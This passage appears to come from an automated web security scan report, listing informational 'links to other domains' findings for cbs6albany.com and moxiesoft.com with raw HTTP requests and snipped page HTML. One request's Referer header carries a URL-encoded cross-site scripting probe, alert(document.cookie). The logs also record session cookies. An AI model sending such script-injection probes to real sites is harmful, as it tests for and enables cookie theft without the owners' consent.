<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.310. http://www.cbs6albany.com/common/archives/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/archives/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /common/archives/?cat=Local+News HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:56 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:56 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 34134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=Local+News&amp;ghier=news%7Carchive&amp;us=anonymous"></script>
...[SNIP]...
<div style="padding-top:4px;padding-right:5px;float:right">
               <a href="http://albany.profootball.upickem.net/"><img src="/images/pro_football.jpg" alt="" border="0" />
...[SNIP]...
<li><a href="http://weathernet6.wrgb.com/">Weathernet6</a>
...[SNIP]...
<li><a href="http://mmod.ncaa.com/" target="_blank">NCAA March Madness on Demand</a>
...[SNIP]...
<li><a href="http://hosted.ap.org/dynamic/fronts/SPORTS?SITE=WRGBTV&amp;SECTION=SPORTS">National</a>
...[SNIP]...
<li><a href="http://twitter.com/CBS6albany" target="_blank">CBS 6 News Feed</a>
...[SNIP]...
<li><a href="http://twitter.com/cbs6_lizb" target="_blank">Liz's Feed</a>
...[SNIP]...
<li><a href="http://twitter.com/CBS6_JerryG" target="_blank">Jerry's Feed</a>
...[SNIP]...
<li><a href="http://www.twitter.com/cbs6_teresa" target="_blank">Teresa's Feed</a>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/WRGB-CBS-6-Albany/51577668476" target="_blank">CBS 6 Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=855419171">Liz's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/jerry.gretzinger.newsman?_fb_noscript=1" target="_blank">Jerry's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/Steve.LaPointe.CBS6?ref=name" target="_blank">Steve LaPointe's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/CBS6Greg">Greg's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=100000446238259">Teresa's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=1428716895&amp;ref=profile" target="_blank">Marci's Facebook</a>
...[SNIP]...
<li><a href="http://www.cwalbany.com" target="_blank">Capital Region's CW</a>
...[SNIP]...
<li><a href="http://www.lively-nation.com/healthy/wrgb/">Healthy Living</a>
...[SNIP]...
<li><a href="http://sixonseniors.freedomblogging.com/">Six on Seniors Blog</a>
...[SNIP]...
<li><a href="http://www.bryantstratton.edu/Locations/New-York/Albany.aspx">Dream Career</a>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/Baptist-Health-Nursing-and-Rehabilitation-Center/167445690394">Baptist Health on Facebook</a>
...[SNIP]...
<li>
<a class="title" href="http://cbs6albany.oodle.com/">Classifieds</a>
...[SNIP]...
<li><a href="http://cbs6albany.oodle.com/vehicle/">Cars</a></li>
<li><a href="http://cbs6albany.oodle.com/housing/sale/">Real Estate</a>
...[SNIP]...
<li><a href="http://cbs6albany.oodle.com/service/">Services</a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/protesters-1282352-police-mubarak.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/schenectady-1282358-murder-reese.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/friday-1282318-councilmen-arraignment.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/pittsfield-1282351-overdue-property.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/water-1282349-releases-officials.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/policy-1282348-new-military.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/gunpoint-1282347-delivery-albany.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/amsterdam-1282346-stealing-home.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/arrested-1282345-old-year.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/district-1282344-central-lock.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/troy-1282343-firefighters-river.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/queensbury-1282342-public-assistance.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/teens-1282340-car-break.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/articles/obama-1282338-law-health.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/new-1282337-rail-connecticut.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/fair-1282336-positions-weekend.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/group-1282335-gunman-watervliet.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<a href="http://www.cbs6albany.com/news/gains-1282333-benefits-wages.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
<br /><img src="http://common.onset.freedom.com/images/searchBox_google_small.gif" width="47" height="14" alt="google" /></div>
...[SNIP]...
<a href="javascript:;" onclick="javascript:document.fisearch2.submit()"><img src="http://common.onset.freedom.com/images/btn_search.gif" border="0" alt="Search"></a>
...[SNIP]...
<li><a href="http://www.cbs.com/info/hdtv/index.php" onclick="window.open('http://www.cbs.com/info/hdtv/index.php');return false">CBS HDTV</a>
...[SNIP]...
<li><a href="http://www.cbs.com" onclick="window.open('http://www.cbs.com');return false">CBS.com</a>
...[SNIP]...
<li><a href="http://www.dailygazette.com" onclick="window.open('http://www.dailygazette.com');return false">Daily Gazette</a>
...[SNIP]...
<li><a href="http://www.berkshireeagle.com/" onclick="window.open('http://www.berkshireeagle.com');return false">Berkshire Eagle</a>
...[SNIP]...
<li><a href="http://spotlightnews.com/" target="_blank">Spotlight Newspapers</a>
...[SNIP]...
<p><a href="http://www.freedom.com/privacy.html" onclick="window.open('http://www.freedom.com/privacy.html');return false">Privacy Policy</a> | <a href="http://www.freedom.com/eula.html" onclick="window.open('http://www.freedom.com/eula.html');return false">User Agreement</a>
...[SNIP]...
<p><a href="http://www.freedom.com" target="_blank">Freedom Communications, Inc.</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-3dNEKaztYvrmc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

17.311. http://www.cbs6albany.com/common/archives/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/archives/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /common/archives/?cat=Movie+Reviews&db=fbi&template=movie.html HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:16 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:16 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 25770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=Education+Promo&amp;ghier=news%7Carchive&amp;us=anonymous"></script>
...[SNIP]...
<div style="padding-top:4px;padding-right:5px;float:right">
               <a href="http://albany.profootball.upickem.net/"><img src="/images/pro_football.jpg" alt="" border="0" />
...[SNIP]...
<li><a href="http://weathernet6.wrgb.com/">Weathernet6</a>
...[SNIP]...
<li><a href="http://mmod.ncaa.com/" target="_blank">NCAA March Madness on Demand</a>
...[SNIP]...
<li><a href="http://hosted.ap.org/dynamic/fronts/SPORTS?SITE=WRGBTV&amp;SECTION=SPORTS">National</a>
...[SNIP]...
<li><a href="http://twitter.com/CBS6albany" target="_blank">CBS 6 News Feed</a>
...[SNIP]...
<li><a href="http://twitter.com/cbs6_lizb" target="_blank">Liz's Feed</a>
...[SNIP]...
<li><a href="http://twitter.com/CBS6_JerryG" target="_blank">Jerry's Feed</a>
...[SNIP]...
<li><a href="http://www.twitter.com/cbs6_teresa" target="_blank">Teresa's Feed</a>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/WRGB-CBS-6-Albany/51577668476" target="_blank">CBS 6 Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=855419171">Liz's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/jerry.gretzinger.newsman?_fb_noscript=1" target="_blank">Jerry's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/Steve.LaPointe.CBS6?ref=name" target="_blank">Steve LaPointe's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/CBS6Greg">Greg's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=100000446238259">Teresa's Facebook</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=1428716895&amp;ref=profile" target="_blank">Marci's Facebook</a>
...[SNIP]...
<li><a href="http://www.cwalbany.com" target="_blank">Capital Region's CW</a>
...[SNIP]...
<li><a href="http://www.lively-nation.com/healthy/wrgb/">Healthy Living</a>
...[SNIP]...
<li><a href="http://sixonseniors.freedomblogging.com/">Six on Seniors Blog</a>
...[SNIP]...
<li><a href="http://www.bryantstratton.edu/Locations/New-York/Albany.aspx">Dream Career</a>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/Baptist-Health-Nursing-and-Rehabilitation-Center/167445690394">Baptist Health on Facebook</a>
...[SNIP]...
<li>
<a class="title" href="http://cbs6albany.oodle.com/">Classifieds</a>
...[SNIP]...
<li><a href="http://cbs6albany.oodle.com/vehicle/">Cars</a></li>
<li><a href="http://cbs6albany.oodle.com/housing/sale/">Real Estate</a>
...[SNIP]...
<li><a href="http://cbs6albany.oodle.com/service/">Services</a>
...[SNIP]...
<a href="http://www.cbs6albany.com/entertainment/simpsons-1370679-fbi-movie-springfield.html" title="" target="_blank"><img src="http://common.onset.freedom.com/images/archive/camera.gif" alt="" width="14" height="12" border="0" align="absmiddle" /></a>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
<br /><img src="http://common.onset.freedom.com/images/searchBox_google_small.gif" width="47" height="14" alt="google" /></div>
...[SNIP]...
<a href="javascript:;" onclick="javascript:document.fisearch2.submit()"><img src="http://common.onset.freedom.com/images/btn_search.gif" border="0" alt="Search"></a>
...[SNIP]...
<li><a href="http://www.cbs.com/info/hdtv/index.php" onclick="window.open('http://www.cbs.com/info/hdtv/index.php');return false">CBS HDTV</a>
...[SNIP]...
<li><a href="http://www.cbs.com" onclick="window.open('http://www.cbs.com');return false">CBS.com</a>
...[SNIP]...
<li><a href="http://www.dailygazette.com" onclick="window.open('http://www.dailygazette.com');return false">Daily Gazette</a>
...[SNIP]...
<li><a href="http://www.berkshireeagle.com/" onclick="window.open('http://www.berkshireeagle.com');return false">Berkshire Eagle</a>
...[SNIP]...
<li><a href="http://spotlightnews.com/" target="_blank">Spotlight Newspapers</a>
...[SNIP]...
<p><a href="http://www.freedom.com/privacy.html" onclick="window.open('http://www.freedom.com/privacy.html');return false">Privacy Policy</a> | <a href="http://www.freedom.com/eula.html" onclick="window.open('http://www.freedom.com/eula.html');return false">User Agreement</a>
...[SNIP]...
<p><a href="http://www.freedom.com" target="_blank">Freedom Communications, Inc.</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-3dNEKaztYvrmc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

17.312. http://www.cbs6albany.com/common/tools/load.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/tools/load.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:27 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 15:39:18 GMT
ETag: "a2c7ae864c4a3cf6c62f0e6ccfec4c7e-26414"
Cache-Control: max-age=86400
Expires: Sat, 29 Jan 2011 17:37:27 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 26414

/* http://www.cbs6albany.com/common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page */
   function loadPoll(pollid,sitecode)
   {
           var
...[SNIP]...
Only display nav if slideCount (alldivs) > 1

////Ajax related settings
var csbustcachevar=0 //bust potential caching of external pages after initial Ajax request? (1=yes, 0=no)
var csloadstatustext="<img src='http://common.onset.freedom.com/images/loading.gif' /> Requesting content..." //HTML to indicate Ajax page is being fetched
var csexternalfiles=[] //External .css or .js files to load to style the external content(s), if any. Separate multiple files with
...[SNIP]...

17.313. http://www.cbs6albany.com/sections/thirdParty/iframe_header/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/thirdParty/iframe_header/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /sections/thirdParty/iframe_header/?taxonomy=classified&cname=section&shier=classified&ghier=classified&trackbyurl=wrgb&usetitle=true&domain=cbs6albany.oodle.com HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://cbs6albany.oodle.com/?2ba1c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0fdede783fa=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1298828234584%26vn%3D1; __qca=P0-387650238-1296236241942; s_nr=1296236252424; ebPanelFrequency_.www.cbs6albany.com=4189023%3A2%3A1%3A1296322656115; ebNewBandWidth_.www.cbs6albany.com=2030%3A1296236256165; s_cc=true; s_lastvisit=1296308278321; fi_dslv=Less%20than%201%20day; s_vnum_w=1296367200803%26vn%3D2; s_vnum_m=1296540000804%26vn%3D2; s_sq=%5B%5BB%5D%5D; Zvents=jblyxxj3qv; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:27:32 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 14:37:32 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 5940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=cbs6albany.oodle.com&amp;ctype=&amp;cname=section&amp;shier=classified&amp;ghier=classified&amp;trackbyurl=wrgb&amp;usetitle=true&amp;us=anonymous"></script>
...[SNIP]...
<div style="padding-top:4px;padding-right:5px;float:right">
               <a target='_top' href="http://albany.profootball.upickem.net/"><img src="http://www.cbs6albany.com/images/pro_football.jpg" alt="" border="0" />
...[SNIP]...
<li><a target='_top' class="title" href="http://cbs6albany.oodle.com/">Classifieds</a>
...[SNIP]...

17.314. http://www.moxiesoft.com/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /search.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search.aspx?searchtext= HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:05:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25903


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
   <link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
                   <a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a> | <a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a> | <a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a> | <a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.315. http://www.moxiesoft.com/tal_lp/campaign.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_lp/campaign.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /tal_lp/campaign.aspx?id=3576 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:05:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75065


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
   <link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
                   <a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
